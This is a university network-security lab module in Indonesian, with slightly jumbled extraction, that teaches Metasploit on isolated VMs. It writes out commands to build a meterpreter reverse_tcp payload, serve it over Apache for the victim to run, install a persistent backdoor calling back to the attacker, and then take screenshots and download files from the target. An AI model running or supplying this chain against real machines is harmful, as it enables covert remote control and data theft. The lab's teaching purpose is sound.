jurnal metasploit(revisi)
TRANSCRIPT
Modul Praktek Network Security Keamanan Jaringan Telkom University
2014-2015
JURNAL PRAKTIKUM
Skema Praktikum
Komputer Penyerang Komputer Target
Sistem Operasi- Ubuntu 12.04
IP Address
- 192.168.1.2
Sistem Operasi- Windows 7
IP Address
- 192.168.1.4
LANGKAH 1
Persiapkan komputer target
1. Ubah pengaturan jaringan Virtual box pada sistem operasi komputer target Setting > jaringan > Adapter 1Centang : Nyalakan Adapter JaringanAttached to : Jaringan Internal
1
Modul Praktek Network Security Keamanan Jaringan Telkom University
2014-2015
Klik mulai untuk menghidupkan mesin virtual komputer target
2. Non aktifkan firewall pada komputer targetStart > Control Panel > System and Security > Windows Firewall > Costumize Setting >
3. Aktifkan remote Desktop pada komputer targetStart > Control Panel > System and Security > System > Remote settings
2
Modul Praktek Network Security Keamanan Jaringan Telkom University
2014-2015
4. Setting IP address pada komputer targetStart > Control Panel > Network and Internet > Network and Sharing Center > Local Area
Connections > Properties >Internet Protocol Version 4 (TCP/IPv4)>Use the following IP address:IP address : 192.168.1.4Subnet mask : 255.255.255.0Default gateway : 192.168.1.1
3
Modul Praktek Network Security Keamanan Jaringan Telkom University
2014-2015
LANGKAH 2
Persiapkan komputer penyerang
1. Ubah pengaturan jaringan Virtual box pada sistem operasi komputer target Setting > jaringan > Adapter 1Centang : Nyalakan Adapter JaringanAttached to : Jaringan Internal
4
Modul Praktek Network Security Keamanan Jaringan Telkom University
2014-2015
2. Klik mulai untuk menghidupkan mesin virtual komputer penyerang
5
Modul Praktek Network Security Keamanan Jaringan Telkom University
2014-2015
3. Masuk sebagai root
4. Setting IP static pada komputer penyerang melalui
Ubah isi file menjadi berikut :
Tekan ctrl + x lalu ketik y untuk menyimpan dan keluar dari editor 5. Restart networking untuk mendapatkan IP address yang telah dikonfigurasi
LANGKAH 3
Melakukan scanning dengan nmap
1. Lakukan foot printing untuk mendapatkan informasi sistem target
Output dari perintah diatas :
6
praktikum@praktikum:~$ sudo su
root@praktikum:~# nano /etc/network/interfaces
auto lo iface lo inet loopback
auto eth0iface eth0 inet loopbackaddress 192.168.1.3netmask 255.255.255.0network 192.168.1.0gateway 192.168.1.1broadcast 192.168.1.255
root@praktikum:~# /etc/init.d/networking restart
root@praktikum:~# nmap –sS –O 192.168.1.1/24 192.168.1.255/24
Modul Praktek Network Security Keamanan Jaringan Telkom University
2014-2015
LANGKAH 4
Uji koneksi dari komputer penyerang ke komputer target :
Output dari perintah diatas :
7
root@praktikum:~$ ping 192.168.1.4
Modul Praktek Network Security Keamanan Jaringan Telkom University
2014-2015
LANGKAH 5
Pastikan apache2 dalam keadaan aktif
LANGKAH 6
Melakukan exploitasi dan instalasi backdoor dari komputer penyerang ke komputer target dengan
metasploit1. Membuat payload di komputer penyerang untuk komputer target
Output dari perintah diatas:
2. Ketik msfconsole untuk memulai metasploit
3. Pilih payload yang sesuai dengan tujuan komputer target
4. setting payload yang tepat dari sesuai dengan tujuan exploitasi
5. Masukan IP komputer penyerang kedalam konfigurasi
Masukan port sesuai yang direncanakan pada pembuatan backdoor
8
root@praktikum:~#/etc/init.d/apache2 restart
msroot@praktikum:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.2
msf exploit(handler) > set LPORT 666
root@praktikum:~#msfpayload windows/meterpreter/reverse_tcpLHOST=192.168.1.2 LPORT=666 x > /var/www/praktikum.exe
msfconsole
Modul Praktek Network Security Keamanan Jaringan Telkom University
2014-2015
6. Lakukan exploitasi
7. Menyimpan backdoor pada komputer target dengan membuka browser pada komputer target,
masukan URL: http://192.168.1.2/praktikum.exe Klik run
Klik run
8. Sampai tahap ini, exploitasi sudah berhasil, kemudian kembali ke komputer penyerang untuk tahap
instalasi backdoor, baca informasi sistem komputer target
9
msf exploit(handler) > exploit
Modul Praktek Network Security Keamanan Jaringan Telkom University
2014-2015
Output dari perintah diatas:
9. Periksa IP Address pada komputer target
Output dari perintah diatas:
10
meterpreter > sysinfo
meterpreter > ifconfig
Modul Praktek Network Security Keamanan Jaringan Telkom University
2014-2015
10. Instalasi backdoor pada komputer penyerang terhadap komputer target
Catatan : 1037 adalah port yang terbuka tetapi belum digunakanOutput dari perintah diatas:
Baris terakhir menunjukan tempat penyimpanan backdoor dari komputer penyerang 11. Keluar dari aktifitas exploitasi
12. Lakukan eksploitasi kembali dengan menggunakan backdoor yang telah diinstal sebelumnya, dengan
mengganti port pada komputer penyerang sesuai port yang disetting sebelumnya yaitu port 1037.
13. Lakukan exploitasi
secara otomatis akan masuk ke payload meterpreter tanpa konfirmasi dari komputer target14. Melihat perintah yang tersedia pada meterpreter
15. Lakukan screenshoot komputer target
buka hasil screenshoot diatas, berikut lokasi penyimpanan
16. Melihat posisi direktori saat ini
11
meterpreter >run persistence –U -i 5 –p 1037 –r 192.168.1.2
meterpreter > exit
msf exploit(handler) > set LPORT 1037
msf exploit(handler) > exploit
meterpreter > help
meterpreter > screenshot
meterpreter > pwd
Modul Praktek Network Security Keamanan Jaringan Telkom University
2014-2015
Outputnya
Jika ingin pindah ke direktori yang lain, contoh :
17. Download file pada komputer target
contoh :
Maka file akan tersimpan pada direktori dimana msfconsole dimulai 18. Lakukan restart mesin target
12
meterpreter > cd D:/
meterpreter > download namafile
meterpreter > reboot